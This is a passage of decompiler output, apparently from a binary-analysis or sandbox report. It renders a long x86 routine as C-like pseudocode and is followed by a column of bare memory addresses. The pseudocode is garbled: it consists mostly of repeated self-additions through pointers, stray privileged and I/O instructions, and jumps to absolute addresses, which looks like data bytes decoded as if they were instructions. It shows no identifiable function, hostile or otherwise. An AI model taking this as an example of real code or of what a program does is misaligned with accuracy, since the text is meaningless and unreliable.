				 *_t390 =  *_t390 + _t233;
				_pop(es);
				_t234 = _t233 | 0x002d3700;
				 *_t234 =  *_t234 + _t234;
				_t306[2] = _t306[2] + _t234;
				asm("int1");
				 *0x40000d07 =  *0x40000d07 + __ecx;
				_t235 = _t234;
				_t439 =  *_t372 +  *_t390 |  *_t305 | __esi |  *(_t235 + 1);
				_t236 = _t235 ^ 0x00000007;
				_push(cs);
				 *((intOrPtr*)(_t373 + 0x2d)) =  *((intOrPtr*)(_t373 + 0x2d)) + __ecx;
				 *_t236 =  *_t236 + _t236;
				 *_t236 =  *_t236 & _t236;
				_t308 =  &(_t306[0]);
				_t420 = _t418 +  *0x2d000c07 |  *(__esi + 1);
				_push(cs);
				_t308[0xb] = _t308[0xb] + _t373;
				 *_t236 =  *_t236 + _t236;
				 *_t236 =  *_t236 + _t236;
				_t237 = _t236 | __esi;
				 *((intOrPtr*)(7 + __ecx)) =  *((intOrPtr*)(7 + __ecx)) + _t237;
				asm("ltr word [ebp+0x2d]");
				 *_t237 =  *_t237 + _t237;
				 *_t237 =  *_t237 & _t237;
				_t374 = _t373 | _t439;
				 *((intOrPtr*)(7 + _t390)) =  *((intOrPtr*)(7 + _t390)) + _t237;
				asm("verr word [esi+0x2d]");
				 *_t237 =  *_t237 + _t237;
				 *_t237 =  *_t237 + _t237;
				_t440 = _t439 |  *(_t374 + 0x10074e01);
				 *((intOrPtr*)(_t237 + 0x2d)) =  *((intOrPtr*)(_t237 + 0x2d)) + _t374;
				 *_t237 =  *_t237 + _t237;
				 *_t237 =  *_t237 & _t237;
				_t312 =  &(_t308[1]);
				_t404 = __esi |  *(__ecx + _t237 + 0x100754);
				if(_t404 < 0) {
					 *_t237 =  *_t237 + _t237;
					 *_t237 =  *_t237 + _t237;
					_t360 = __ecx |  *(_t420 + 0x11074102);
					 *((intOrPtr*)(_t420 + 0x200000 + _t420)) =  *((intOrPtr*)(_t420 + 0x200000 + _t420)) + _t237;
					_t312 = ( &(_t312[0]) | _t312[0x441d1c1]) + _t237 + 1;
					_t404 = _t404 |  *_t360;
					_t237 = _t237 +  *_t390;
					_pop(es);
					asm("adc al, [eax]");
					 *0x200000 =  *0x200000 >> 1;
				}
				_t312[2] = _t312[2] + _t237;
				_t239 = _t237 - 0xffffffffda001207;
				_t313 =  &(_t312[0]);
				_t405 = _t404 |  *_t239;
				_t313[1] = _t313 + _t313[1];
				asm("adc eax, [eax]");
				asm("in al, 0x2d");
				 *_t239 =  *_t239 + _t239;
				 *_t239 =  *_t239 & _t239;
				_t240 = _t239 |  *(_t360 + 1);
				asm("popad");
				_pop(es);
				asm("adc eax, [eax]");
				asm("daa");
				 *[cs:eax] =  *[cs:eax] + _t240;
				 *_t240 =  *_t240 + _t240;
				_t421 = _t420;
				asm("adc al, 0x0");
				_t241 = _t240 ^ 0x0000002e;
				 *_t241 =  *_t241 + _t241;
				 *_t241 =  *_t241 & _t241;
				_t317 =  &(_t313[0]) + _t313[2] + 1;
				_t391 = _t390 | _t405;
				_t242 = _t241 +  *((intOrPtr*)(7 + _t360));
				asm("adc al, 0x0");
				if(_t242 <= 0) {
					 *_t242 =  *_t242 + _t242;
					 *_t242 =  *_t242 + _t242;
					_t295 = _t242 |  *(_t391 + 2);
					_pop(_t355);
					_pop(es);
					asm("adc eax, 0x2e8400");
					 *_t295 =  *_t295 + _t295;
					 *((intOrPtr*)(_t355 + 0xb)) =  *((intOrPtr*)(_t355 + 0xb)) + _t295;
					_pop(_t296);
					_t297 = _t296 +  *((intOrPtr*)(7 + _t360));
					asm("adc eax, 0x2ec700");
					 *_t297 =  *_t297 + _t297;
					 *((intOrPtr*)(_t355 + 0xb)) =  *((intOrPtr*)(_t355 + 0xb)) + _t297;
					asm("retf");
					_t317 = _t355 +  *((intOrPtr*)(_t355 + 7));
					_push(ss);
					_t242 = _t297 + _t374;
					 *[cs:eax] =  *[cs:eax] + _t242;
					 *_t242 =  *_t242 & _t242;
				}
				_t243 = _t242 +  *((intOrPtr*)(7 + _t360));
				_push(ss);
				 *_t391 =  *_t391 + _t374;
				asm("das");
				 *_t243 =  *_t243 + _t243;
				 *_t243 =  *_t243 + _t243;
				_t422 = _t421 |  *(_t360 + 0x17075b02);
				 *((intOrPtr*)(_t391 + _t422)) =  *((intOrPtr*)(_t391 + _t422)) + _t243;
				 *_t243 =  *_t243 + _t243;
				 *_t243 =  *_t243 & _t243;
				_t392 = _t391 |  *(_t374 + 0x17076102);
				 *((intOrPtr*)(0x2f + _t392)) =  *((intOrPtr*)(0x2f + _t392)) + _t243;
				 *_t243 =  *_t243 + _t243;
				 *_t243 =  *_t243 + _t243;
				_t323 = (_t317 + 0x00000001 | _t440) + 3 |  *_t243;
				_t58 = 7 + _t243;
				 *_t58 =  *((intOrPtr*)(7 + _t243)) + _t422;
				asm("sbb [eax], al");
				if( *_t58 != 0) {
					 *_t243 =  *_t243 + _t243;
					 *_t243 =  *_t243 & _t243;
					_t323 = _t323 + 1;
					_t440 = _t440 |  *(_t360 + _t243);
					asm("outsb");
					_pop(es);
					asm("sbb [eax], al");
					 *_t360 = 0x2f +  *_t360;
					 *((intOrPtr*)(_t422 + 0x19045307)) =  *((intOrPtr*)(_t422 + 0x19045307)) + _t360;
					 *0x0000005F =  *((intOrPtr*)(0x5f)) + 0x2f;
					 *_t405 =  *_t405 + 0x2f;
					asm("sbb [edx+0x19], bl");
					_push(es);
					 *_t374 =  *_t374 + _t323;
					_t243 = 0x2f + _t323;
					 *0x2f =  *0x2f ^ _t243;
					 *0x2f =  *0x2f + _t243;
					 *_t360 =  *_t360 + _t243;
				}
				 *((intOrPtr*)(_t243 + 0x1a0775)) =  *((intOrPtr*)(_t243 + 0x1a0775)) + _t360;
				asm("sbb eax, 0x32");
				 *_t360 =  *_t360 + _t243;
				_pop(es);
				asm("sbb al, 0x0");
				_t324 = _t323 + 1;
				_t246 = _t243 + _t243 + 0x00000075 ^  *(_t243 + _t243 + 0x75);
				 *_t246 =  *_t246 + _t246;
				 *_t360 =  *_t360 + _t246;
				_t67 = _t360 + 0xf;
				 *_t67 =  *((intOrPtr*)(_t360 + 0xf)) + _t324;
				if( *_t67 == 0) {
					_push(ds);
					 *((intOrPtr*)(_t405 + 0x32)) =  *((intOrPtr*)(_t405 + 0x32)) + _t246;
					 *_t246 =  *_t246 + _t246;
					 *_t246 =  *_t246 + _t246;
				}
				 *_t405 =  *_t405 + _t246;
				asm("sbb [edx+0x19], bl");
				_push(es);
				 *_t246 =  *_t246 + _t246;
				 *((intOrPtr*)(_t246 + 0x32)) =  *((intOrPtr*)(_t246 + 0x32)) + _t374;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				_push(es);
				 *_t360 =  *_t360 | _t374;
				asm("adc dh, [edx]");
				_t247 = _t246 +  *_t246;
				 *((intOrPtr*)(_t247 + 0x32)) =  *((intOrPtr*)(_t247 + 0x32)) + _t360;
				 *_t247 =  *_t247 + _t247;
				 *_t247 =  *_t247 + _t247;
				_push(es);
				 *0x20018f12 =  *0x20018f12 | _t247;
				 *((intOrPtr*)(_t374 + _t405)) =  *((intOrPtr*)(_t374 + _t405)) + _t247;
				 *_t247 =  *_t247 | _t374;
				asm("sbb [edx], dh");
				_t248 = _t247 +  *_t360;
				 *((intOrPtr*)(_t374 + _t405)) =  *((intOrPtr*)(_t374 + _t405)) + _t324;
				 *(_t248 + _t324 - 0x71) =  *(_t248 + _t324 - 0x71) | _t248;
				 *_t360 =  *_t360 + _t440;
				 *((intOrPtr*)(_t248 + 0x32)) =  *((intOrPtr*)(_t248 + 0x32)) + _t374;
				 *_t405 =  *_t405 + _t248;
				 *(_t392 + 0x14) =  *(_t392 + 0x14) | _t248;
				asm("repe add [edx], ah");
				_t250 = _t248 + _t360 ^  *(_t248 + _t360);
				 *_t250 =  *_t250 + _t250;
				 *_t405 =  *_t405 + _t250;
				 *(_t324 + 0x14) =  *(_t324 + 0x14) | _t324;
				asm("adc eax, 0xfc002200");
				_t251 = _t250 ^  *_t250;
				 *_t251 =  *_t251 + _t251;
				 *_t360 =  *_t360 + _t251;
				 *_t374 =  *_t374 + _t360;
				asm("sbb bh, [ebp+0x7]");
				_t253 = es;
				_t254 = _t253 ^  *_t253;
				 *_t254 =  *_t254 + _t254;
				 *_t360 =  *_t360 + _t374;
				_t375 = _t374 + _t374;
				asm("adc [edi+0x70002507], eax");
				_t255 = _t254 ^  *_t254;
				 *_t255 =  *_t255 + _t255;
				 *_t360 =  *_t360 + _t255;
				_t256 = _t255 + _t324;
				 *(_t392 + _t256 + 0x33c40026) =  *(_t392 + _t256 + 0x33c40026) & _t360;
				 *_t256 =  *_t256 + _t256;
				 *_t256 =  *_t256 + _t256;
				 *_t256 =  *_t256 + _t256;
				_t257 = _t256 & 0x28078c1d;
				 *_t257 =  *_t257 + _t375;
				_t258 = _t257 ^ 0x00000000;
				 *_t258 =  *_t258 + _t258;
				 *_t405 =  *_t405 + _t258;
				 *_t258 =  *_t258 + _t375;
				asm("sbb eax, 0x2a0796");
				_t259 = es;
				_t260 = _t259 ^ 0x00000000;
				 *_t260 =  *_t260 + _t260;
				 *_t360 =  *_t360 + _t260;
				 *(_t392 + 0x14) =  *(_t392 + 0x14) + _t360;
				asm("repe add [edx], ch");
				 *((intOrPtr*)(_t260 + 0x34)) =  *((intOrPtr*)(_t260 + 0x34)) + _t375;
				 *_t360 =  *_t360 + _t260;
				_t261 = _t260 | 0x002a07a1;
				asm("loopne 0x36");
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				asm("lodsd");
				asm("adc [edx], esi");
				_t362 = _t360 + _t260 +  *_t324;
				 *_t261 =  *_t261 + _t375;
				_t262 = _t261 ^ 0x00000000;
				 *_t262 =  *_t262 + _t262;
				 *_t262 =  *_t262 + _t262;
				 *[ss:eax] =  *[ss:eax] + _t262;
				 *_t262 =  *_t262 + _t262;
				 *_t262 =  *_t262 + _t262;
				_t263 = _t262 - 0x2b000614;
				 *((intOrPtr*)(_t263 + 0x36)) =  *((intOrPtr*)(_t263 + 0x36)) + _t362;
				 *_t362 =  *_t362 + _t263;
				_t376 = _t375 + _t324;
				asm("adc eax, 0x2b0006");
				 *_t263 =  *_t263 + _t263;
				 *_t263 =  *_t263 + _t263;
				 *_t263 =  *_t263 + _t263;
				asm("adc dl, [esi+eax]");
				 *_t324 =  *_t324 + _t362;
				 *((intOrPtr*)(0x2b000605 + _t405)) =  *((intOrPtr*)(0x2b000605 + _t405)) + _t362;
				 *_t263 =  *_t263 + _t263;
				 *_t263 =  *_t263 + _t263;
				 *_t263 =  *_t263 + _t263;
				 *((intOrPtr*)(_t405 + _t263)) =  *((intOrPtr*)(_t405 + _t263)) + _t376;
				 *_t324 =  *_t324 + _t362;
				 *((intOrPtr*)(_t263 + 0x37)) =  *((intOrPtr*)(_t263 + 0x37)) + _t324;
				 *_t263 =  *_t263 + _t263;
				 *_t263 =  *_t263 + _t263;
				 *_t263 =  *_t263 + _t263;
				asm("rol dword [0x2b0006], cl");
				L10();
				 *_t362 =  *_t362 + _t263;
				 *_t376 =  *_t376 + _t263;
				_t264 = _t263 + 0x2b0006;
				asm("adc edi, [eax]");
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				_push(es);
				asm("sbb [edx+0x19], bl");
				_push(es);
				 *_t324 =  *_t324 + _t362;
				 *((intOrPtr*)(_t264 + 0x2b000605)) =  *((intOrPtr*)(_t264 + 0x2b000605)) + _t362;
				 *_t264 =  *_t264 + _t264;
				_t266 = _t264 + _t264 + _t264 + _t264;
				 *0x9c002b00 =  *0x9c002b00 | _t376;
				 *_t266 =  *_t266 + _t266;
				 *_t362 =  *_t362 + _t266;
				 *((intOrPtr*)(_t376 + 0x20)) =  *((intOrPtr*)(_t376 + 0x20)) + _t376;
				_push(es);
				 *((intOrPtr*)(_t266 + _t266)) =  *((intOrPtr*)(_t266 + _t266)) + _t362;
				_t394 = 0x2b000605 -  *_t376;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				asm("sbb eax, 0x2c0768");
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 & _t266;
				_t326 = _t324 + 2;
				_t441 = _t440 | 0x2b000605;
				asm("sbb eax, 0x2c076e");
				if(_t441 == 0) {
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					_t326 = _t326 + 1;
					_t405 = _t405 - 1;
					_pop(es);
					_t293 = _t266 - 0x3a8800;
					 *_t293 =  *_t293 + _t293;
					_t112 = _t326 + 0xb;
					 *_t112 =  *((intOrPtr*)(_t326 + 0xb)) + _t293;
					if( *_t112 == 0) {
						es = _t441;
					}
					_t266 = _t293 - 0x3acb00;
					 *_t266 =  *_t266 + _t266;
					 *_t405 =  *_t405 + _t266;
					 *((intOrPtr*)(_t394 + _t266 + 6)) =  *((intOrPtr*)(_t394 + _t266 + 6)) + _t326;
					 *_t405 =  *_t405 + _t362;
					 *((intOrPtr*)(_t326 + 0x32)) =  *((intOrPtr*)(_t326 + 0x32)) + _t266;
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					 *_t266 =  *_t266 + _t266;
					_t422 = 0x2e077504;
					 *((intOrPtr*)(_t326 + 0x32)) =  *((intOrPtr*)(_t326 + 0x32)) + _t266;
					 *_t266 =  *_t266 + _t266;
				}
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				_t378 =  *_t266 * 0x75;
				_pop(es);
				 *_t266 =  *_t266 ^ _t266;
				asm("loopne 0x3c");
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				_push(es);
				 *(_t422 + 2) =  *(_t422 + 2) | _t394;
				_t327 = _t326 + 1;
				_t269 = _t266 + _t362 ^  *(_t266 + _t362) ^  *(_t266 + _t362 ^  *(_t266 + _t362));
				 *_t269 =  *_t269 + _t269;
				 *_t362 =  *_t362 + _t269;
				 *_t378 =  *_t378 + _t269;
				asm("adc [esi-0x10ffcdf9], esp");
				 *_t269 =  *_t269 + _t269;
				 *_t405 =  *_t405 + _t269;
				asm("sbb [edx+0x19], bl");
				_push(es);
				 *((intOrPtr*)(_t269 + _t269)) =  *((intOrPtr*)(_t269 + _t269)) + _t378;
				 *_t327 =  *_t327 + _t327;
				 *_t269 =  *_t269 + _t269;
				 *_t269 =  *_t269 + _t269;
				 *_t269 =  *_t269 + _t269;
				if( *_t269 == 0) {
					_t269 = _t269 ^ 0x00000000;
					_t441 = _t441 + 1;
					 *_t269 =  *_t269 + _t269;
				}
				 *_t362 =  *_t362 + _t269;
				_t328 = _t327 + _t269;
				_pop(es);
				 *_t405 =  *_t405 + _t378;
				 *((intOrPtr*)(_t328 + _t394)) =  *((intOrPtr*)(_t328 + _t394)) + _t378;
				 *_t269 =  *_t269 + _t269;
				 *_t405 =  *_t405 + _t269;
				 *((intOrPtr*)(_t394 + 0x15)) =  *((intOrPtr*)(_t394 + 0x15)) + _t362;
				asm("scasb");
				es = es;
				 *[ss:ebx+edi] =  *[ss:ebx+edi] + _t328;
				 *((intOrPtr*)(_t269 + 0xe)) =  *((intOrPtr*)(_t269 + 0xe)) + _t328;
				_t379 = es;
				_t380 = _t379 +  *_t405;
				_t363 = _t362 + _t269;
				 *_t269 =  *_t269 + _t269;
				 *_t363 =  *_t363 + _t269;
				 *_t328 =  *_t328 + _t363;
				asm("adc [ebp+0x7], dh");
				_t270 = _t269 + _t380;
				 *_t270 =  *_t270 + _t270;
				 *_t363 =  *_t363 + _t270;
				 *((intOrPtr*)(_t328 + 0x38000619)) =  *((intOrPtr*)(_t328 + 0x38000619)) + _t328;
				 *_t270 =  *_t270 + _t328;
				 *_t270 =  *_t270 + _t270;
				_push(ss);
				asm("adc [ebp+0x7], dh");
				_t271 = _t270 & 0x0000003d;
				 *_t271 =  *_t271 + _t271;
				 *_t271 =  *_t271 + _t271;
				 *_t271 =  *_t271 + _t271;
				goto 0x4c00;
				 *[ds:eax] =  *[ds:eax] + _t271;
				 *_t271 =  *_t271 + _t271;
				 *_t271 =  *_t271 + _t271;
				_t134 = _t422 + 0x10;
				 *_t134 =  *((intOrPtr*)(_t422 + 0x10)) + _t380;
				if( *_t134 == 0) {
					_pop(_t271);
					 *[ds:eax] =  *[ds:eax] + _t271;
					 *_t271 =  *_t271 + _t271;
				}
				 *_t363 =  *_t363 + _t271;
				 *_t380 =  *_t380 + _t363;
				asm("sbb al, 0x6");
				 *((intOrPtr*)(_t271 + _t271)) =  *((intOrPtr*)(_t271 + _t271)) + _t328;
				 *_t271 =  *_t271 + _t271;
				 *_t363 =  *_t363 + _t271;
				_t138 = _t422 + 0x10;
				 *_t138 =  *((intOrPtr*)(_t422 + 0x10)) + _t328;
				if( *_t138 == 0) {
					_t328 =  *_t394;
					 *_t271 =  *_t271 + _t271;
					 *_t271 =  *_t271 + _t271;
				}
				 *_t363 =  *_t363 + _t271;
				 *((intOrPtr*)(_t394 + 0x1e)) =  *((intOrPtr*)(_t394 + 0x1e)) + _t380;
				_push(es);
				 *_t405 =  *_t405 + _t328;
				 *((intOrPtr*)(_t394 + _t394)) =  *((intOrPtr*)(_t394 + _t394)) + _t380;
				 *_t271 =  *_t271 + _t271;
				_t406 = _t405 + 1;
				_push(ds);
				asm("adc [eax], al");
				_t273 = _t271 + _t363 + 1;
				 *_t273 =  *_t273 + _t273;
				 *_t273 =  *_t273 + _t273;
				 *_t273 =  *_t273 + _t273;
				_t395 = _t273;
				asm("pcmpeqw mm0, [edi]");
				asm("aas");
				_t276 = _t394 + _t328 + 1;
				 *_t276 =  *_t276 + _t276;
				 *_t276 =  *_t276 + _t276;
				 *_t276 =  *_t276 + _t276;
				asm("wait");
				_t277 = _t276 + 6;
				 *_t363 =  *_t363 + _t277;
				_push(_t441);
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				asm("cmc");
				asm("adc [ebp+0x7], dh");
				_t364 = _t363 + 1;
				_t406[0x10] = _t406[0x10] + _t328;
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				_push(es);
				 *_t328 =  *_t328 + _t277;
				asm("insd");
				_t382 = _t380 + 2;
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				asm("stosd");
				asm("pcmpeqw mm0, [edi]");
				_t329 = _t328 + 1;
				 *((intOrPtr*)(_t277 + 0x42)) =  *((intOrPtr*)(_t277 + 0x42)) + _t329;
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				 *_t277 =  *_t277 + _t277;
				 *((intOrPtr*)(_t441 + 0x8a000c06)) =  *((intOrPtr*)(_t441 + 0x8a000c06)) + _t364;
				 *0x45000603 =  *0x45000603 + 0x45000603;
				 *0x45000603 =  *0x45000603 + 0x45000603;
				 *0x45000603 =  *0x45000603 + 0x45000603;
				_t365 =  *_t395;
				 *_t395 = _t364;
				if( *0x45000603 == 0) {
					_t422 = _t422 + 1;
					 *0x45000603 =  *0x45000603 + _t329;
					_t441 = _t441 + 1;
					 *0x45000603 =  *0x45000603 + 0x45000603;
					 *0x45000603 =  *0x45000603 + 0x45000603;
				}
				 *_t365 =  *_t365 + 0x45000603;
				 *((intOrPtr*)(_t441 + 0x45470609)) =  *((intOrPtr*)(_t441 + 0x45470609)) + _t382;
				asm("in al, dx");
				 *0x45000603 =  *0x45000603 + 0x45000603;
				 *0x45000603 =  *0x45000603 + 0x45000603;
				 *0x45000603 =  *0x45000603 + 0x45000603;
				asm("rcl dword [eax], 0x75");
				_pop(es);
				_t396 = _t395 + 1;
				_t279 = 0x45000603 + _t329;
				_t424 = _t422 + 2;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				_push(es);
				 *_t365 =  *_t365 + _t365;
				_t280 = _t279 | 0x00000048;
				 *_t280 =  *_t280 + _t280;
				 *_t280 =  *_t280 + _t280;
				 *_t280 =  *_t280 + _t280;
				_t281 = _t280 + 1;
				asm("adc [ebp+0x7], dh");
				_t366 = _t365 - 1;
				 *_t281 =  *_t281 + _t329;
				_t282 = _t281 - 1;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				_push(es);
				 *_t329 =  *_t329 + _t366;
				_t283 = _t282 + 0x49;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				_t384 = 0x0000001b |  *_t366;
				if(0x1b == 0) {
					_t329 = _t329 - 1;
					 *_t283 =  *_t283 + 0x1b;
					_t366 = _t366 - 1;
					 *_t283 =  *_t283 + _t283;
					 *_t283 =  *_t283 + _t283;
				}
				 *_t366 =  *_t366 + _t283;
				 *0x4d000623 =  *0x4d000623 + _t384;
				_t284 = _t283 + _t366;
				_t385 = _t384 - 1;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				asm("in al, 0x10");
				if( *_t284 == 0) {
					_t424 = _t424 - 1;
					_t284 = _t284 + _t385;
					_t385 = _t385 - 1;
					 *_t284 =  *_t284 + _t284;
					 *_t284 =  *_t284 + _t284;
				}
				 *_t366 =  *_t366 + _t284;
				 *_t385 =  *_t385 + _t284;
				_t285 = _t284 &  *_t406;
				 *_t396 =  *_t396 + _t366;
				asm("int3");
				_t442 = _t441 - 1;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				asm("rcl dword [eax], 1");
				if( *_t285 == 0) {
					_t396 = _t396 - 1;
					_t285 = _t285 + _t329;
					_t442 = _t442 - 1;
					 *_t285 =  *_t285 + _t285;
					 *_t285 =  *_t285 + _t285;
				}
				 *_t366 =  *_t366 + _t285;
				 *_t385 =  *_t385 + _t285;
				_t286 = _t285 &  *_t406;
				 *_t366 =  *_t366 + _t385;
				 *_t286 =  *_t286 + _t286;
				 *_t366 =  *_t366 + _t286;
				 *((intOrPtr*)(_t329 + 0x5107750f)) =  *((intOrPtr*)(_t329 + 0x5107750f)) + _t329;
				 *((intOrPtr*)(_t406 + _t366 * 2)) =  *((intOrPtr*)(_t406 + _t366 * 2)) + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t366 =  *_t366 + _t286;
				_t330 = _t329 + _t385;
				_t287 = _t286 +  *_t406;
				 *_t330 =  *_t330 + _t385;
				asm("movsb");
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				asm("les eax, [edx]");
				asm("ror byte [ecx], 0x15");
				 *_t330 =  *_t330 + _t385;
				asm("hlt");
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				if( *_t287 >= 0) {
					 *((intOrPtr*)(_t287 + _t287 - 0x4a)) =  *((intOrPtr*)(_t287 + _t287 - 0x4a)) + _t385;
					 *_t287 =  *_t287 + _t287;
					 *_t287 =  *_t287 + _t287;
					_t366 = _t366 | _t385;
					es = es;
					_t442 = 0xc0005407;
					 *_t287 =  *_t287 + _t287;
					 *_t287 =  *_t287 & _t287;
					_t330 = _t330 + 2 | _t442;
					_pop(es);
					asm("outsb");
					_pop(es);
					_push(_t442);
					 *_t330 =  *_t330 + _t287;
				}
				_t331 = _t330 +  *_t424;
				 *_t287 =  *_t287 + _t287;
				 *((intOrPtr*)(_t331 + 0xb)) =  *((intOrPtr*)(_t331 + 0xb)) + _t287;
				 *0x2000005d =  *0x2000005d + _t366;
				 *((intOrPtr*)(_t331 + 0xb)) =  *((intOrPtr*)(_t331 + 0xb)) + 7;
				asm("sahf");
				_t425 = ss;
				 *7 = 7 +  *7;
				 *7 = 7 +  *7;
				_t387 = 0x16005507 |  *(_t425 + 0x56076819);
				 *7 = 7 +  *7;
				 *7 = 7 +  *7;
				 *7 =  *7 & 0x00000007;
				_t333 = _t331 + 2;
				 *((intOrPtr*)(_t333 + 0x5d)) =  *((intOrPtr*)(_t333 + 0x5d)) + 7;
				 *7 = 7 +  *7;
				 *7 = 7 +  *7;
				 *7 = 7 +  *7;
				 *7 =  *7 & 0x00000007;
				_t335 = _t333 + 2;
				_t289 = 0x00000007 |  *0x6D07C320;
				 *((intOrPtr*)(_t335 + 0x5d)) =  *((intOrPtr*)(_t335 + 0x5d)) + _t387;
				 *((intOrPtr*)(_t335 + 0xb)) =  *((intOrPtr*)(_t335 + 0xb)) + _t289;
				asm("loop 0x1d");
				 *_t289 =  *_t289 + _t289;
				 *_t289 =  *_t289 & _t289;
				_t336 = _t335 + 1;
				asm("sbb ebp, [esi+0x7]");
				_t290 = 0xc0005807;
				 *_t336 =  *_t336 + _t290;
				_t408 = 0x70005707;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 & _t290;
				_t339 = (_t336 + 0x00000001 |  *(_t408 + _t336 + 1)) + 1;
				asm("outsb");
				es = ds;
				 *((intOrPtr*)(_t339 + 0x5e)) =  *((intOrPtr*)(_t339 + 0x5e)) + _t387;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 & _t290;
				_t342 = _t339 + 2 |  *(_t339 + 2 + _t290 + 0x6e);
				es = 0x60005a07;
				_t388 = 0x10005907;
				 *((intOrPtr*)(_t342 + 0x5e)) =  *((intOrPtr*)(_t342 + 0x5e)) + 7;
				 *((intOrPtr*)(_t342 + 0xb)) =  *((intOrPtr*)(_t342 + 0xb)) + _t290;
				_t412 = 0xb0005b07;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 & _t290;
				_t291 = _t290 |  *(_t412 + 0x22);
				asm("outsb");
				es = _t424;
				_t344 = ss;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				_t292 = _t291 ^ 0x00000007;
				_pop(_t414);
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 & _t292;
				 *_t414 =  *_t414 + _t292;
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 + _t388;
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 & _t292;
				_t349 = _t344 + _t388 + 4;
				 *((intOrPtr*)(_t349 + 0x5f)) =  *((intOrPtr*)(_t349 + 0x5f)) + _t388;
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 + _t292;
				 *((intOrPtr*)(_t292 + 0x5f)) =  *((intOrPtr*)(_t292 + 0x5f)) + 7;
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 & _t292;
				_t351 = _t349 + 2;
				asm("outsb");
				_pop(es);
				 *((intOrPtr*)(_t351 + 0x5f)) =  *((intOrPtr*)(_t351 + 0x5f)) + _t292;
				 *((intOrPtr*)(_t351 + 0xb)) =  *((intOrPtr*)(_t351 + 0xb)) + _t292;
				return _t292;
			}

0x011d85c8
0x011d85c8
0x011d85ca
0x011d85cc
0x011d85d0
0x011d85d1
0x011d85d3
0x011d85d5
0x011d85d7
0x011d85dc
0x011d85de
0x011d85e0
0x011d85e2
0x011d85e4
0x011d85e6
0x011d85ea
0x011d85ec
0x011d85ec
0x011d85ee
0x011d85f0
0x011d85f2
0x011d85f5
0x011d85f7
0x011d85f8
0x011d85fa
0x011d85fc
0x011d85fe
0x011d8600
0x011d8602
0x011d8604
0x011d8605
0x011d8608
0x011d860a
0x011d860c
0x011d860e
0x011d8610
0x011d8613
0x011d8614
0x011d8616
0x011d8619
0x011d861b
0x011d861d
0x011d8620
0x011d8622
0x011d8626
0x011d8628
0x011d862b
0x011d862f
0x011d8631
0x011d8638
0x011d863a
0x011d8641
0x011d8643
0x011d8645
0x011d8647
0x011d8649
0x011d864a
0x011d864f
0x011d8651
0x011d8653
0x011d8655
0x011d8657
0x011d8659
0x011d865a
0x011d865f
0x011d8661
0x011d8663
0x011d8667
0x011d866d
0x011d866f
0x011d8673
0x011d8675
0x011d8676
0x011d867b
0x011d867d
0x011d867f
0x011d8681
0x011d8683
0x011d8684
0x011d8689
0x011d868b
0x011d868d
0x011d8691
0x011d8692
0x011d8697
0x011d8699
0x011d869b
0x011d86a0
0x011d86a2
0x011d86a5
0x011d86ab
0x011d86b1
0x011d86b3
0x011d86b5
0x011d86b7
0x011d86bb
0x011d86be
0x011d86c9
0x011d86cc
0x011d86ce
0x011d86d0
0x011d86d2
0x011d86db
0x011d86e0
0x011d86e3
0x011d86e5
0x011d86e6
0x011d86eb
0x011d86ed
0x011d86f0
0x011d86f1
0x011d86f7
0x011d86fd
0x011d8700
0x011d8702
0x011d8703
0x011d8706
0x011d8708
0x011d870a
0x011d870b
0x011d8710
0x011d8711
0x011d8714
0x011d8716
0x011d8719
0x011d871b
0x011d871e
0x011d8722
0x011d8724
0x011d8727
0x011d8729
0x011d872c
0x011d8730
0x011d8732
0x011d8735
0x011d873b
0x011d873e
0x011d8740
0x011d8742
0x011d8743
0x011d874a
0x011d874c
0x011d874e
0x011d8751
0x011d8757
0x011d876c
0x011d876d
0x011d876f
0x011d8771
0x011d8772
0x011d8774
0x011d8774
0x011d8779
0x011d8783
0x011d8788
0x011d8789
0x011d878b
0x011d878e
0x011d8790
0x011d8792
0x011d8794
0x011d8797
0x011d879a
0x011d879b
0x011d879c
0x011d879e
0x011d879f
0x011d87a2
0x011d87a5
0x011d87aa
